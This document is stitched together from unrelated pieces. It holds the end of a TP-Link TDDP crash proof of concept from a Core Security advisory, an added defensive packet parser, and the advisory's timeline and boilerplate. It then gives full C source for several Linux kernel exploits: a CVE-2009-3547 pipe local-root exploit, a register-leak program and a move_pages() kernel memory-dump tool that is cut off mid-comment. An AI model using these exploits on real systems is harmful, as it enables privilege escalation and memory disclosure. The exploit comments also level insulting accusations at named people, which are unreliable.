        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)
        
        
class Exploit(TDDPSessionV1):
    def run(self):
        c_packet = self.req_buidler.getRequestPacket()
        c_packet['type'] = self.req_buidler.SET_CONFIG        
        c_packet['payload'] = "A"*325
        c_packet['packetLength'] = 0x0264           
        return self.send(c_packet)

HOST = "192.168.1.254"
PORT = 1040
s = Exploit(HOST, PORT)
s.run()
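The crash PoC above declares a packetLength (0x264) that disagrees with the number of bytes actually sent, and carries a far larger body than any request in the advisory. As an added example (not code from the advisory or from Core Security), here is a Python 3 parser for the TDDP v1 header as laid out in the PoC's Impacket Structure, with the checks a monitoring sensor watching UDP/1040 could apply; the 256-byte payload threshold and the sample datagrams are constructed assumptions.

```python
"""TDDP v1 datagram parser with sanity checks (added example, not advisory code)."""
import struct
from dataclasses import dataclass, field
from typing import List

HEADER_LEN = 12
# Message type values as named in the advisory's TDDPRequestsPacketBuilder.
SET_CONFIG, GET_CONFIG, CMD_SYS0_PR, GET_SERIAL_NUMBER, GET_PRODUCT_ID = 1, 2, 3, 5, 10
TYPE_NAMES = {SET_CONFIG: "SET_CONFIG", GET_CONFIG: "GET_CONFIG",
              CMD_SYS0_PR: "CMD_SYS0_PR", GET_SERIAL_NUMBER: "GET_SERIAL_NUMBER",
              GET_PRODUCT_ID: "GET_PRODUCT_ID"}
# Hypothetical tuning value: the advisory's legitimate requests carry a 16-byte
# zero prefix plus a short command, so anything far larger deserves a look.
MAX_SET_CONFIG_PAYLOAD = 256


@dataclass
class TDDPHeader:
    version: int
    msg_type: int
    code: int
    reply_info: int
    packet_length: int   # big-endian u32; should equal len(payload)
    pkt_id: int          # little-endian u16
    sub_type: int
    reserved: int


@dataclass
class TDDPReport:
    header: TDDPHeader
    payload: bytes
    findings: List[str] = field(default_factory=list)


def parse_tddp(datagram: bytes) -> TDDPReport:
    """Split a UDP payload into the 12-byte TDDP header and body, then check it."""
    if len(datagram) < HEADER_LEN:
        raise ValueError("datagram shorter than the 12-byte TDDP header")
    # The header mixes endianness (packetLength is '>L', pktID is '<H' in the
    # PoC's Structure), so it is unpacked in two steps.
    version, msg_type, code, reply_info, packet_length = struct.unpack(">BBBBL", datagram[:8])
    pkt_id, sub_type, reserved = struct.unpack("<HBB", datagram[8:HEADER_LEN])
    header = TDDPHeader(version, msg_type, code, reply_info, packet_length,
                        pkt_id, sub_type, reserved)
    payload = datagram[HEADER_LEN:]
    report = TDDPReport(header, payload)

    if msg_type not in TYPE_NAMES:
        report.findings.append(f"UNKNOWN_TYPE: type {msg_type} is not a known TDDP command")
    if packet_length != len(payload):
        report.findings.append(f"LEN_MISMATCH: declared packetLength {packet_length} "
                               f"but {len(payload)} payload bytes present")
    if msg_type == SET_CONFIG and version == 1:
        report.findings.append("V1_SET_CONFIG: version-1 set-configuration request "
                               "(the handler the advisory reports as overflowing)")
    if msg_type == SET_CONFIG and len(payload) > MAX_SET_CONFIG_PAYLOAD:
        report.findings.append(f"OVERSIZED_SET_CONFIG: {len(payload)} payload bytes "
                               f"exceed the {MAX_SET_CONFIG_PAYLOAD}-byte threshold")
    return report


def finding_codes(datagram: bytes) -> List[str]:
    """Just the short codes, convenient for alert rules and tests."""
    return [f.split(":", 1)[0] for f in parse_tddp(datagram).findings]


def is_suspicious(datagram: bytes) -> bool:
    return bool(parse_tddp(datagram).findings)


def _constructed_datagram(msg_type: int, reply_info: int, packet_length: int,
                          payload: bytes) -> bytes:
    """Constructed test input only: a version-1 datagram in the PoC's field order."""
    return (struct.pack(">BBBBL", 1, msg_type, 0, reply_info, packet_length)
            + struct.pack("<HBB", 1, 0, 0) + payload)


# Constructed sample 1: the GET_CONFIG request exactly as the advisory's builder shapes it.
SAMPLE_GET_CONFIG = _constructed_datagram(GET_CONFIG, 1, 16 + 3, b"\x00" * 16 + b"all")
# Constructed sample 2: the shape of the crash PoC (declared length 0x264, 325 filler bytes).
SAMPLE_CRASH_SHAPED = _constructed_datagram(SET_CONFIG, 1, 0x0264, b"A" * 325)

if __name__ == "__main__":
    for name, dg in (("get_config", SAMPLE_GET_CONFIG), ("crash_shaped", SAMPLE_CRASH_SHAPED)):
        rep = parse_tddp(dg)
        print(f"{name}: type={TYPE_NAMES.get(rep.header.msg_type)} "
              f"packetLength={rep.header.packet_length} actual={len(rep.payload)}")
        for f in rep.findings:
            print("   ", f)
```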
	  
 
8. Report Timeline

2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE ID's for this advisory.
2016-11-12: Mitre replied that the vulnerabilities didn't affect products that were in the scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.

9. References

[1] http://www.tplink.com/
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
            
/* exp_moosecox.c
   Watch a video of the exploit here:
   http://www.youtube.com/watch?v=jt81NvaOj5Y

   developed entirely by Ingo Molnar (exploit writer extraordinaire!),
   thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :)

   dedicated to the Red Hat employees who get paid to copy+paste my 
   twitter and issue security advisories, their sweet 
   acknowledgement policy, and general classiness
   see: https://bugzilla.redhat.com/show_activity.cgi?id=530490

   "policy" aside, there's a word for what you guys are doing: "plagiarism"
   in fact, i tested this one day by posting three links to twitter,
   without any discussion on any of them.  the same day, those three
   (and only those three) links were assigned CVEs, even though two of 
   them weren't even security bugs (it doesn't pay to copy+paste)

   official Ingo Molnar (that's me) policy for acknowledgement in 
   exploits requires general douche-ness or plagiarization
   official policy further dictates immediate exploit release for
   embargoed, patched bug

   I'll be curious to see what the CVE statistics are like for the 
   kernel this year when they get compiled next year -- I'm predicting 
   that when someone's watching the sleepy watchers, a more personal 
   interest is taken in doing the job that you're paid to do correctly.

   --------------------------------------------------------------------

   Special PS note to Theo (I can do this here because I know he'll 
   never read it -- the guy is apparently oblivious to the entire world of 
   security around him -- the same world that invents the protections 
   years before him that he pats himself on the back for "innovating")
   Seriously though, it's incredible to me that an entire team 
   of developers whose sole purpose is to develop a secure operating 
   system can be so oblivious to the rest of the world.  They haven't 
   innovated since they replaced exploitable string copies with 
   exploitable string truncations 6 or so years ago.

   The entire joke of a thread can be read here:
   http://www.pubbs.net/openbsd/200911/4582/
   "Our focus therefore is always on finding innovative ideas which make 
    bugs very hard to exploit successfully."
   "He's too busy watching monkey porn instead of
    building researching last-year's security technology that will stop 
    an exploit technique that has been exploited multiple times."
   "it seems that everyone else is slowly coming around to the
    same solution."

   So let's talk about this "innovation" of theirs with their 
   implementation of mmap_min_addr:

   They implemented it in 2008, a year after Linux implemented it, a 
   year after the public phrack article on the bug class, more than a 
   year after my mail to dailydave with the first public Linux kernel 
   exploit for the bug class, and over two years after UDEREF was 
   implemented in PaX (providing complete protection against the smaller 
   subset of null ptr dereference bugs and the larger class of invalid 
   userland access in general).

   OpenBSD had a public null pointer dereference exploit (agp_ioctl()) 
   published for its OS in January of 2007.  It took them over a year 
   and a half to implement the same feature that was implemented in 
   Linux a few months after my public exploit in 2007.

   So how can it be that "everyone else is slowly coming around to the 
   same solution"  when "everyone else" came to that solution over a 
   year before you Theo?  In fact, I predicted this exact situation would 
   happen back in 2007 in my DD post:
   http://lists.virus.org/dailydave-0703/msg00011.html
   "Expect OpenBSD to independently invent a protection against null ptr 
    deref bugs sometime in 2009."

   Let's talk about some more "innovation" -- position independent 
   executables.  PaX implemented position independent executables on 
   Linux back in 2001 (ET_DYN).  PIE binary support was added to GNU 
   binutils in 2003.  Those OpenBSD innovators implemented PIE binaries 
   in 2008, 7 years after PaX.  Innovation indeed!

   How about their W^X/ASLR innovation?  These plagiarists have the 
   audacity to announce on their press page:
   http://www.openbsd.org/press.html
   "Microsoft borrows one of OpenBSD's security features for Vista, 
    stack/library randomization, under the name Address Space Layout 
    Randomization (ASLR).  "Until now, the feature has been most 
    prominently used in the OpenBSD Unix variant and the PaX and Exec 
    Shield security patches for Linux""
   Borrowing one of your features?  Where'd this ASLR acronym come from 
   anyway?  Oh that's right, PaX again -- when they published the first 
   design and implementation of it, and coined the term, in July 2001.
   It covered the heap, mmap, and stack areas.
   OpenBSD implemented "stack-gap randomization" in 2003.  Way to 
   innovate!

   W^X, which is a horrible name as OpenBSD doesn't even enforce it with 
   mprotect restrictions like PaX did from the beginning or even SELinux 
   is doing now (from a 3rd party contribution modeled after PaX): 
   PaX implemented true per-page non-executable page support, protecting 
   binary data, the heap, and the stack, back in 2000.
   OpenBSD implemented it in 2003, requiring a full userland rebuild.
   The innovation is overwhelming!

   They keep coming up with the same exact "innovations" others came up 
   with years before them.  Their official explanation for where they 
   got the W^X/ASLR ideas was a drunk guy came into their tent at one of 
   their hack-a-thons and started talking about the idea.  They had 
   never heard of PaX when we asked them in 2003.  Which makes the 
   following involuntarily contributed private ICB logs from Phrack #66
   (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:

   On some sunny day in July 2002 (t: Theo de Raadt):
   <cloder> why can't you just randomize the base
   <cloder> that's what PaX does
   <t> You've not been paying attention to what art's saying, or you don't 
    understand yet, either case is one of think it through yourself.
   <cloder> whatever

   Only to see poetic justice in August 2003 (ttt: Theo again):

   <miod> more exactly, we heard of pax when they started bitching
   <ttt> miod, that was very well spoken.

   That wraps up our OpenBSD history lesson, in case anyone forgot it.
   PS -- enjoy that null ptr deref exploit just released for OpenBSD.

   --------------------------------------------------------------------

   Important final exploit notes:

   don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,
   or DEBUG_SPINLOCK are enabled and modify the structures below 
   accordingly -- a fancier exploit would do this automatically

   I've broken the 2.4->2.6.10 version of the exploit and would like to see 
   someone fix it ;)  See below for more comments on this.
*/

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sched.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include "exp_framework.h"

int pipefd[2];
struct exploit_state *exp_state;
int is_old_kernel = 0;

int go_go_speed_racer(void *unused)
{
    int ret;

    while (!exp_state->got_ring0) {
        /* bust spinlock */
        *(unsigned int *)NULL = is_old_kernel ? 0 : 1;
        ret = pipe(pipefd);
        if (!ret) {
            close(pipefd[0]);
            close(pipefd[1]);
        }
    }

    return 0;
}

/* <3 twiz/sgrakkyu */
int start_thread(int (*f)(void *), void *arg)
{
    char *stack = malloc(0x4000);
    int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
    if (tid < 0) {
        printf("can't create thread\n");
        exit(1);
    }
    sleep(1);
    return tid;
}

char *desc = "MooseCox: Linux <= 2.6.31.5 pipe local root";
char *cve = "CVE-2009-3547";

#define PIPE_BUFFERS 16

/* this changes on older kernels, but it doesn't matter to our method */
struct pipe_buf_operations {
    int can_merge;
    void *map;
    void *unmap;
    void *confirm;
    void *release;
    void *steal;
    void *get;
};

struct pipe_buffer2620ornewer {
    void *page;
    unsigned int offset, len;
    void *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buffer2619orolder {
    void *page;
    unsigned int offset, len;
    void *ops;
    unsigned int flags;
};

struct pipe_buffer2616orolder {
    void *page;
    unsigned int offset, len;
    void *ops;
};

struct pipe_inode_info2620ornewer {
    unsigned int spinlock;
    /*
    // LOCKBREAK
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    void *owner;
    */
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    void *tmp_page;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
    void *inode;
    struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];
};

struct pipe_inode_info2619orolder {
    unsigned int spinlock;
    /*
    // if PREEMPT enabled
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    void *owner;
    */
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    struct pipe_buffer2619orolder bufs[PIPE_BUFFERS];
    void *tmp_page;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
    void *inode;
};

struct pipe_inode_info2616orolder {
    unsigned int spinlock;
    /*
    // if PREEMPT enabled
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    */
    void *owner;
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    struct pipe_buffer2616orolder bufs[PIPE_BUFFERS];
    void *tmp_page;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
};

struct fasync_struct {
    int magic;
    int fa_fd;
    struct fasync_struct *fa_next;
    void *file;
};

struct pipe_inode_info2610orolder {
    /* this includes 2.4 kernels */
    unsigned long lock; // can be rw or spin
    void *next, *prev;
    char *base;
    unsigned int len;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    /* 2.4 only */
    unsigned int waiting_readers;

    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    /* 2.6 only */
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
};

int prepare(unsigned char *buf)
{    
    struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;
    struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;
    struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;
    struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;
    struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;
    int i;
    int newver;
    struct utsname unm;

    i = uname(&unm);
    if (i != 0) {
        printf("unable to get kernel version\n");
        exit(1);
    }

    if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') {
        fprintf(stdout, " [+] Using newer pipe_inode_info layout\n");
        newver = 3;
    } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {
        fprintf(stdout, " [+] Using older pipe_inode_info layout\n");
        newver = 2;
    } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {
        fprintf(stdout, " [+] Using older-er pipe_inode_info layout\n");
        newver = 1;
//    } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {
//        is_old_kernel = 1;
//        newver = 0;
    } else {
        fprintf(stdout, " [+] This kernel is still vulnerable, but I can't be bothered to write the exploit.  Write it yourself.\n");
        exit(1);
    }

    /* for most of these what will happen is our write will
       cause ops->confirm(/pin) to be called, which we've replaced
       with own_the_kernel
       for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets
       called instead (repeatedly) is the release op
    */
    if (newver == 3) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_new->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_new->next = &info_new->next;
        info_new->readers = 1;
        info_new->writers = 1;
        info_new->nrbufs = 1;
        info_new->curbuf = 1;
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_new->bufs[i].ops = (void *)ops;
    } else if (newver == 2) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_old->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_old->next = &info_old->next;
        info_old->readers = 1;
        info_old->writers = 1;
        info_old->nrbufs = 1;
        info_old->curbuf = 1;
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_old->bufs[i].ops = (void *)ops;
    } else if (newver == 1) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_older->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_older->next = &info_older->next;
        info_older->readers = 1;
        info_older->writers = 1;
        info_older->nrbufs = 1;
        info_older->curbuf = 1;
        /* we'll get called multiple times from free_pipe_info
           but it's ok because own_the_kernel handles this case
        */
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_older->bufs[i].ops = (void *)ops;
    } else {
        /*
        different ballgame here, instead of being able to 
        provide a function pointer in the ops table, you 
        control a base address used to compute the address for 
        a copy into the kernel via copy_from_user.  The 
        following should get you started.
        */
        /* lookup symbol for writable fptr then trigger it later
           change the main write in the one thread to write out 
           pointers with the value of exp_state->exploit_kernel
        */
        info_oldest->base = (char *)0xc8000000;
        info_oldest->readers = 1;
        info_oldest->writers = 1;
        return 0;
    }

    ops->can_merge = 1;
    for (i = 0; i < 16; i++)
        ((void **)&ops->map)[i] = exp_state->own_the_kernel;

    return 0;
}

int requires_null_page = 1;

int get_exploit_state_ptr(struct exploit_state *ptr)
{
    exp_state = ptr;
    return 0;
}

int trigger(void)
{
    char buf[128];
    int fd;
    int i = 0;

    /* ignore sigpipe so we don't bail out early */
    signal(SIGPIPE, SIG_IGN);

    start_thread(go_go_speed_racer, NULL);

    fprintf(stdout, " [+] We'll let this go for a while if needed...\n");
    fflush(stdout);

    while (!exp_state->got_ring0 && i < 10000000) {
        fd = pipefd[1];
        sprintf(buf, "/proc/self/fd/%d", fd);
        fd = open(buf, O_WRONLY | O_NONBLOCK);
        if (fd >= 0) {
            /* bust spinlock */
            *(unsigned int *)NULL = is_old_kernel ? 0 : 1;
            write(fd, ".", 1);
            close(fd);
        }
        i++;
    }

    if (!exp_state->got_ring0) {
        fprintf(stdout, " [+] Failed to trigger the vulnerability.  Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\n");
        return 0;
    }

    return 1;
}

int post(void)
{
//    return RUN_ROOTSHELL;
    return FUNNY_PIC_AND_ROOTSHELL;
}
            
/* written by Ingo Molnar -- it's true because this comment says the exploit
   was written by him!
*/

#include <stdio.h>
#include <sys/syscall.h>

unsigned int _r81;
unsigned int _r82;
unsigned int _r91;
unsigned int _r92;
unsigned int _r101;
unsigned int _r102;
unsigned int _r111;
unsigned int _r112;
unsigned int _r121;
unsigned int _r122;
unsigned int _r131;
unsigned int _r132;
unsigned int _r141;
unsigned int _r142;
unsigned int _r151;
unsigned int _r152;

int leak_it(void)
{
	asm volatile (
	".intel_syntax noprefix\n"
	".code32\n"
	"jmp label1\n"
	"farcalllabel1:\n"
	".code64\n"
	"mov eax, r8d\n"
	"shr r8, 32\n"
	"mov ebx, r8d\n"
	"mov ecx, r9d\n"
	"shr r9, 32\n"
	"mov edx, r9d\n"
	"mov esi, r10d\n"
	"shr r10, 32\n"
	"mov edi, r10d\n"
	".att_syntax noprefix\n"
	"lret\n"
	".intel_syntax noprefix\n"
	"farcalllabel2:\n"
	"mov eax, r11d\n"
	"shr r11, 32\n"
	"mov ebx, r11d\n"
	"mov ecx, r12d\n"
	"shr r12, 32\n"
	"mov edx, r12d\n"
	"mov esi, r13d\n"
	"shr r13, 32\n"
	"mov edi, r13d\n"
	".att_syntax noprefix\n"
	"lret\n"
	".intel_syntax noprefix\n"
	"farcalllabel3:\n"
	"mov eax, r14d\n"
	"shr r14, 32\n"
	"mov ebx, r14d\n"
	"mov ecx, r15d\n"
	"shr r15, 32\n"
	"mov edx, r15d\n"
	".att_syntax noprefix\n"
	"lret\n"
	".intel_syntax noprefix\n"
	".code32\n"
	"label1:\n"
	".att_syntax noprefix\n"
	"lcall $0x33, $farcalllabel1\n"
	".intel_syntax noprefix\n"
	"mov _r81, eax\n"
	"mov _r82, ebx\n"
	"mov _r91, ecx\n"
	"mov _r92, edx\n"
	"mov _r101, esi\n"
	"mov _r102, edi\n"
	".att_syntax noprefix\n"
	"lcall $0x33, $farcalllabel2\n"
	".intel_syntax noprefix\n"
	"mov _r111, eax\n"
	"mov _r112, ebx\n"
	"mov _r121, ecx\n"
	"mov _r122, edx\n"
	"mov _r131, esi\n"
	"mov _r132, edi\n"
	".att_syntax noprefix\n"
	"lcall $0x33, $farcalllabel3\n"
	".intel_syntax noprefix\n"
	"mov _r141, eax\n"
	"mov _r142, ebx\n"
	"mov _r151, ecx\n"
	"mov _r152, edx\n"
	".att_syntax noprefix\n"
	);

	printf(" R8=%08x%08x\n", _r82, _r81);
	printf(" R9=%08x%08x\n", _r92, _r91);
	printf("R10=%08x%08x\n", _r102, _r101);
	printf("R11=%08x%08x\n", _r112, _r111);
	printf("R12=%08x%08x\n", _r122, _r121);
	printf("R13=%08x%08x\n", _r132, _r131);
	printf("R14=%08x%08x\n", _r142, _r141);
	printf("R15=%08x%08x\n", _r152, _r151);
	return 0;
}

/* ripped from jon oberheide */
const int randcalls[] = {
	__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
	__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
	__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
	__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
	__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
	__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
	__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
	__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
	__NR_sched_getparam, __NR_sched_get_priority_max
};

int main(void)
{
	/* to keep random stack values from being used for pointers in syscalls */
	char buf[64] = {};
	int call;
	for (call = 0; call < sizeof(randcalls)/sizeof(randcalls[0]); call++) {
		syscall(randcalls[call]);
		leak_it();
	}

}
            
/* sieve (because the Linux kernel leaks like one, get it?)
   Bug NOT discovered by Marcus Meissner of SuSE security
   This bug was discovered by Ramon de Carvalho Valle in September of 2009
   The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS
   for the bug (but had forgotten about it until now)
   Ramon's report was sent to Novell's internal bugzilla, upon which 
   some months later Marcus took credit for discovering someone else's bug
   Maybe he thought he could get away with it ;)  Almost ;)

   greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle!

   first exploit of 2010, next one will be for a bugclass that has
   afaik never been exploited on Linux before

   note that this bug can also cause a DoS like so:

Unable to handle kernel paging request at ffffffff833c3be8 RIP: 
 [<ffffffff800dc8ac>] new_page_node+0x31/0x48
PGD 203067 PUD 205063 PMD 0 
Oops: 0000 [1] SMP 
Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1
RIP: 0010:[<ffffffff800dc8ac>]  [<ffffffff800dc8ac>] 
new_page_node+0x31/0x48
RSP: 0018:ffff8100a3c6de50  EFLAGS: 00010246
RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013
RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2
RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c
R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018
R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28
FS:  00002b8481125810(0000) GS:ffffffff803c0000(0000) 
knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0
Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task 
ffff81009d8c4080)
Stack:  ffffffff800dd008 ffffc20000077000 ffffffff800dc87b 
0000000000000000
 0000000000000000 0000000000000003 ffff810092c23800 0000000000000003
 00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000
Call Trace:
 [<ffffffff800dd008>] migrate_pages+0x8d/0x42b
 [<ffffffff800dc87b>] new_page_node+0x0/0x48
 [<ffffffff8009cee2>] schedule_on_each_cpu+0xda/0xe8
 [<ffffffff800dd8a2>] sys_move_pages+0x339/0x43d
 [<ffffffff8005d28d>] tracesys+0xd5/0xe0


Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff 
RIP  [<ffffffff800dc8ac>] new_page_node+0x31/0x48
 RSP <ffff8100a3c6de50>
CR2: ffffffff833c3be8
*/

/* _GNU_SOURCE must be defined before the first include so that
   <unistd.h> declares syscall() */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"

#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)

int max_numnodes;

unsigned long node_online_map;

unsigned long node_states;

unsigned long our_base;
unsigned long totalhigh_pages;

#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif

/* random notes I took when writing this (all applying to the 64bit case):

checking in a bitmap based on node_states[2] or node_states[3] 
(former if HIGHMEM is not present, latter if it is)

each node_state is of type nodemask_t, which is is a bitmap of size 
MAX_NUMNODES/8

RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size

so the effective base we're working with is either node_states + 16 or 
node_states + 24

on 2.6.18 it's based off node_online_map

node_isset does a test_bit based on this base

so our specfic case does: base[ourval / 8] & (1 << (ourval & 7))

all the calculations appear to be signed, so we can both index in the 
negative and positive direction, based on ourval

on 64bit, this gives us a 256MB range above and below our base to grab 
memory of 
(by passing in a single page and a single node for each bit we want to 
leak the value of, we can reconstruct entire bytes)

we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps,
subtracting their difference, and multiplying by 8
but we don't need to do this
*/

struct exploit_state *exp_state;

char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";

int get_exploit_state_ptr(struct exploit_state *ptr)
{
	exp_state = ptr;
	return 0;
}

int requires_null_page = 0;

void addr_to_nodes(unsigned long addr, int *nodes)
{
	int i;
	int min = 0x80000000 / 8;
	int max = 0x7fffffff / 8; 

	if ((addr < (our_base - min)) ||
	    (addr > (our_base + max))) {
		/* addr is an unsigned long, not a pointer, so print it with %#lx */
		fprintf(stdout, "Error: Unable to dump address %#lx\n", addr);
		exit(1);
	}

	for (i = 0; i < 8; i++) {
		nodes[i] = ((int)(addr - our_base) << 3) | i;
	}

	return;
}

char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
	int nodes[8];
	int node;
	int status;
	int i;
	int ret;
	unsigned char tmp = 0;

	addr_to_nodes(addr, nodes);
	for (i = 0; i < 8; i++) {
		node = nodes[i];
		/* errno is only meaningful after a failed call; clear it so a
		   successful probe is not misread as the previous ENODEV */
		errno = 0;
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno != ENODEV)
			/* anything but ENODEV means node_isset() saw the probed bit set */
			tmp |= (1 << i);
	}
	
	return tmp;
}	

void menu(void)
{
	fprintf(stdout, "Enter your choice:\n"
			" [0] Dump via symbol/address with length\n"
			" [1] Dump entire range to file\n"
			" [2] Quit\n");
}

int trigger(void)
{
	unsigned long addr;
	unsigned long addr2;
	unsigned char thebyte;
	unsigned char choice = 0;
	char ibuf[1024];
	char *p;
	FILE *f;

	// get lingering \n
	getchar();
	while (choice != '2') {
		menu();
		fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
		choice = ibuf[0];
		
		switch (choice) {
		case '0':
			fprintf(stdout, "Enter the symbol or address for the base:\n");
			fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
			p = strrchr((char *)&ibuf, '\n');
			if (p)
				*p = '\0';
			addr = exp_state->get_kernel_sym(ibuf);
			if (addr == 0) {
				addr = strtoul(ibuf, NULL, 16);
			}
			if (addr == 0) {
				fprintf(stdout, "Invalid symbol or address.\n");
				break;
			}
			addr2 = 0;
			while (addr2 == 0) {
				fprintf(stdout, "Enter the length of bytes to read in hex:\n");
				/* addr2 is an unsigned long, so the conversion must be %lx */
				fscanf(stdin, "%lx", &addr2);
				// get lingering \n
				getchar();
			}
			addr2 += addr;
			
			fprintf(stdout, "Leaked bytes:\n");
			while (addr < addr2) {	
				thebyte = get_byte_at_addr(addr);
				printf("%02x ", thebyte);
				addr++;
			}
			printf("\n");
			break;
		case '1':
			addr = our_base -  0x10000000;
#ifdef __x86_64__
			/* 
			   our lower bound will cause us to access
